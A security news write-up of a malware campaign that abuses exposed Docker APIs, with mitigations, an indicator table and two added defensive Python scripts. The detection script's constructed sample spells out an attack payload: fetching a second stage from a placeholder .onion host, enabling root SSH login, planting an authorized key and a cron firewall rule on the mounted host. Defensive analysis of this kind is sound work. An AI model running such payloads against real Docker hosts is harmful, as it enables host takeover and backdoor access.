First observed in August 2025, this variant diverges significantly from the June 2025 variant documented by Trend Micro: it locks rival attackers out of the host, embeds multiple infection tools, and lays the groundwork for a potential distributed botnet.
The attack begins with an HTTP POST request to the Docker daemon's remote API (TCP port 2375, which by default carries neither TLS nor authentication), instructing it to create an Alpine Linux container with the host's root filesystem bind-mounted into it.
The container executes a Base64-encoded shell command that installs curl and Tor, fetches a second-stage script from a Tor hidden service, and, through the mounted host filesystem, edits the host's SSH configuration to permit root login and adds an attacker-controlled public key for backdoor access.
A cron job is then written to the host's /etc/crontab that loops through whichever firewall utilities are present (firewall-cmd, ufw, pfctl, iptables, nft) to block port 2375. This closes the door the attacker came through: subsequent API requests from anyone else are dropped, and the attacker, who now has SSH, keeps exclusive control of the host.
Once persistence is in place, the container reports the compromised host to its command-and-control (C2) server over Tor, then downloads and executes a compressed binary that unpacks into a Go-based dropper embedding additional tools.
After parsing active user sessions from the utmp file, the dropper launches masscan to hunt for other hosts exposing the Docker API on port 2375. Each host it finds is compromised in the same way, so the infection propagates on its own.
The binary also contains dormant routines for Telnet (port 23), using default device credentials, and for Chromium remote debugging (port 9222), using the chromedp library. Neither is invoked in the current build, which points to planned expansion.
Defenders can identify this threat by monitoring for newly created containers that run a package manager (apk, apt, yum) and immediately follow it with curl or wget.
Other key indicators are Base64-encoded commands passed to a shell, outbound Tor traffic to .onion addresses, and a previously reachable service on a critical port (2375, 9222, 23) that abruptly stops responding; in this campaign that is the attacker's own firewall rule, not a service failure.
Additional signs include containers with host bind mounts that touch /etc or /var/run/docker.sock, and cron entries that manipulate firewall rules.
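The following triage script is an added example, not code from the article or from the malware it describes. It inspects Docker Engine API `POST /containers/create` request bodies (the same JSON the daemon accepts on port 2375) and flags the combination described above: a host filesystem bind mount plus a Base64-encoded shell command that installs packages, fetches from a .onion address, edits the SSH configuration, adds an authorized key, or writes a cron line that firewalls port 2375. Both request bodies, the .onion hostname and the SSH key are constructed for illustration; the indicator names and the scoring are the author's own choices, not anything from the campaign.

```python
"""Flag Docker API container-create requests that match the described pattern.

Added example: the request bodies, .onion name and SSH key below are constructed.
"""
import base64
import json
import re

# Host paths whose bind-mount into a container hands over control of the host.
SENSITIVE_HOST_PATHS = {"/", "/etc", "/root", "/var/run/docker.sock", "/run/docker.sock"}

# Behaviours from the write-up, as regexes run over the command (decoded if Base64).
COMMAND_INDICATORS = {
    "package_install": re.compile(r"\b(apk add|apt(-get)? install|yum install)\b"),
    "fetch_tool": re.compile(r"\b(curl|wget)\b"),
    "tor_onion": re.compile(r"[a-z2-7]{16,56}\.onion", re.I),
    "sshd_root_login": re.compile(r"PermitRootLogin\s+yes|sshd_config"),
    "ssh_backdoor_key": re.compile(r"authorized_keys|ssh-(rsa|ed25519)\s+[A-Za-z0-9+/=]+"),
    "firewall_block_2375": re.compile(r"(iptables|nft|ufw|firewall-cmd|pfctl)\b.*2375"),
    "crontab_write": re.compile(r"/etc/crontab|crontab\s+-"),
}

# Long Base64-looking tokens, e.g. the blob in "echo <blob> | base64 -d | sh".
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_base64_tokens(text):
    """Return decoded UTF-8 strings for every Base64 token in text that decodes cleanly."""
    decoded = []
    for tok in B64_TOKEN.findall(text):
        try:
            decoded.append(base64.b64decode(tok, validate=True).decode("utf-8"))
        except ValueError:  # binascii.Error and UnicodeDecodeError both subclass ValueError
            continue
    return decoded


def is_sensitive(path):
    """True for the host root, or anything at or below another sensitive path."""
    path = path.rstrip("/") or "/"
    if path == "/":
        return True
    return any(path == s or path.startswith(s + "/") for s in SENSITIVE_HOST_PATHS if s != "/")


def host_mounts(spec):
    """Host source paths from HostConfig.Binds ("host:container[:opts]") and HostConfig.Mounts."""
    hc = spec.get("HostConfig", {})
    sources = [b.split(":", 1)[0] for b in hc.get("Binds", [])]
    sources += [m.get("Source", "") for m in hc.get("Mounts", []) if m.get("Type") == "bind"]
    return sources


def _as_text(value):
    """Cmd and Entrypoint may be a list or a single string in the Engine API."""
    if value is None:
        return ""
    return value if isinstance(value, str) else " ".join(value)


def analyze_create_request(body):
    """Analyze one POST /containers/create JSON body; 'score' is the number of distinct findings."""
    spec = json.loads(body)
    findings = []
    sensitive = [p for p in host_mounts(spec) if is_sensitive(p)]
    if sensitive:
        findings.append("host_mount:" + ",".join(sensitive))
    if spec.get("HostConfig", {}).get("Privileged"):
        findings.append("privileged")
    cmd = (_as_text(spec.get("Entrypoint")) + " " + _as_text(spec.get("Cmd"))).strip()
    texts = [cmd] + decode_base64_tokens(cmd)
    if len(texts) > 1:
        findings.append("base64_command")
    for name, rx in COMMAND_INDICATORS.items():
        if any(rx.search(t) for t in texts):
            findings.append(name)
    return {"image": spec.get("Image"), "findings": findings, "score": len(findings)}


# Constructed sample: an ordinary nginx deployment with a read-only config mount.
BENIGN_REQUEST = json.dumps({
    "Image": "nginx:1.27",
    "Cmd": ["nginx", "-g", "daemon off;"],
    "HostConfig": {"Binds": ["/srv/www/nginx.conf:/etc/nginx/nginx.conf:ro"]},
})

# Constructed sample modelled on the described attack: Alpine with the host root
# mounted at /mnt, running a Base64-encoded payload. The .onion and key are placeholders.
_PAYLOAD = (
    "apk add --no-cache curl tor; "
    "curl -x socks5h://127.0.0.1:9050 http://exampleexampleexample.onion/stage2 -o /tmp/s; "
    "echo 'PermitRootLogin yes' >> /mnt/etc/ssh/sshd_config; "
    "echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyExampleKeyExampleKey x' >> /mnt/root/.ssh/authorized_keys; "
    "echo '* * * * * root iptables -I INPUT -p tcp --dport 2375 -j DROP' >> /mnt/etc/crontab"
)
MALICIOUS_REQUEST = json.dumps({
    "Image": "alpine",
    "Cmd": ["sh", "-c", "echo " + base64.b64encode(_PAYLOAD.encode()).decode() + " | base64 -d | sh"],
    "HostConfig": {"Binds": ["/:/mnt"]},
})

if __name__ == "__main__":
    for label, req in (("benign", BENIGN_REQUEST), ("malicious", MALICIOUS_REQUEST)):
        print(label, json.dumps(analyze_create_request(req)))
```

On a real host the input would come from the daemon's own logs or from a proxy in front of the API socket; any request that both mounts a sensitive host path and carries a Base64-encoded command deserves a page regardless of score.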
Mitigation strategies focus on reducing attack surface and enforcing network hygiene:
– Isolate Docker hosts behind internal firewalls and apply network segmentation to limit lateral movement.
– Restrict the Docker API, the Chromium remote debugging port and the Telnet service to trusted management networks only; port 2375 in particular should never be reachable from an untrusted network.
– Enforce strong credential policies and rotate default passwords on all devices.
– Implement host-based monitoring to alert on unauthorized additions to SSH authorized_keys and changes to crontab.
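A minimal version of the host-based check in the last item, as an added example that is not part of the article: it compares root's authorized_keys and /etc/crontab against a saved baseline, reporting keys that are new (identified by their OpenSSH-style SHA256 fingerprint, so a re-wrapped or re-commented key still matches) and new cron lines that invoke a firewall utility, which is the persistence pattern described above. The baseline and current file contents are constructed inline so the script runs offline; the key blobs are structurally valid ssh-ed25519 wire encodings built from arbitrary bytes, not real keys, and the cron line only imitates the described loop.

```python
"""Baseline-and-diff check for authorized_keys and /etc/crontab.

Added example: file contents below are constructed; keys are not real keys.
"""
import base64
import hashlib
import re

FIREWALL_TOOLS = re.compile(r"\b(iptables|ip6tables|nft|ufw|firewall-cmd|pfctl)\b")


def parse_authorized_keys(text):
    """Return (key_type, fingerprint, comment) for each usable key line."""
    keys = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        # A line may begin with options such as no-pty,from="..."; the key type
        # is the first field that looks like one, followed by the Base64 blob.
        for i, field in enumerate(parts):
            if field.startswith(("ssh-", "ecdsa-", "sk-")) and i + 1 < len(parts):
                ktype, blob, comment = field, parts[i + 1], " ".join(parts[i + 2:])
                break
        else:
            continue
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:
            continue  # malformed blob; sshd would reject the line as well
        # OpenSSH prints fingerprints as SHA256:<base64 without padding>.
        fp = "SHA256:" + base64.b64encode(hashlib.sha256(raw).digest()).decode().rstrip("=")
        keys.append((ktype, fp, comment))
    return keys


def new_keys(baseline_text, current_text):
    """Keys present now but absent from the baseline, compared by fingerprint."""
    known = {fp for _, fp, _ in parse_authorized_keys(baseline_text)}
    return [k for k in parse_authorized_keys(current_text) if k[1] not in known]


def new_firewall_cron_lines(baseline_text, current_text):
    """Cron lines added since the baseline that call a firewall utility."""
    known = set(baseline_text.splitlines())
    return [
        line for line in current_text.splitlines()
        if line not in known and not line.lstrip().startswith("#") and FIREWALL_TOOLS.search(line)
    ]


def _fake_ed25519_blob(seed):
    """Structurally valid ssh-ed25519 blob: string "ssh-ed25519", then a 32-byte string.
    The 32 bytes are a hash of the seed, i.e. constructed, not a real key."""
    key = hashlib.sha256(seed).digest()
    return base64.b64encode(b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + key).decode()


# Constructed baseline: one legitimate admin key and a stock hourly cron line.
BASELINE_KEYS = f"ssh-ed25519 {_fake_ed25519_blob(b'admin')} admin@bastion\n"
BASELINE_CRON = "SHELL=/bin/sh\n17 * * * * root cd / && run-parts --report /etc/cron.hourly\n"

# Constructed "current" state: a second key with no comment, and a cron line that
# imitates the firewall loop from the write-up.
CURRENT_KEYS = BASELINE_KEYS + f"ssh-ed25519 {_fake_ed25519_blob(b'attacker')}\n"
CURRENT_CRON = BASELINE_CRON + (
    "* * * * * root for t in firewall-cmd ufw pfctl iptables nft; do "
    "command -v $t >/dev/null && iptables -I INPUT -p tcp --dport 2375 -j DROP; done\n"
)

if __name__ == "__main__":
    for ktype, fp, comment in new_keys(BASELINE_KEYS, CURRENT_KEYS):
        print(f"NEW SSH KEY: {ktype} {fp} {comment!r}")
    for line in new_firewall_cron_lines(BASELINE_CRON, CURRENT_CRON):
        print("NEW FIREWALL CRON LINE:", line)
```

Run it from cron or a file-integrity agent against the live files, but keep the baseline outside any path a host-mounted container can write to; otherwise the attacker, who has the host root mounted, can simply update the baseline along with the files.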
By combining proactive threat hunting with strict API access controls and segmentation, organizations can neutralize emerging Docker-based threats before they escalate.
| IOC | Type |
|---|---|
| wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion | Tor hidden service (.onion domain) |
| 2hdv5kven4m422wx4dmqabotumkeisrstzkzaotvuhwx3aebdig573qd[.]onion | Tor hidden service (.onion domain) |
| webhook[.]site/4fea5cbb-8863-4f25-862a-fd8f02095207 | URL |
| c38e013ed9aa1ef46411bef9605f7a41823f3eefebb8b30b9e35f39723c14d7c | SHA-256 hash (docker-init.sh) |
| 649974453ed40b72d08d378d72d43161ed5bd093a4f80eb5285f75e16fedbeb2 | SHA-256 hash (system) |
| 9451d3dc4b0ff9ea6afa503ffbfcd877944cac0860d6a0b8779c2bb5d03d3446 | SHA-256 hash (dockerd) |
The post New Malware Exploits Exposed Docker APIs to Establish Persistent SSH Root Access appeared first on Cyber Security News.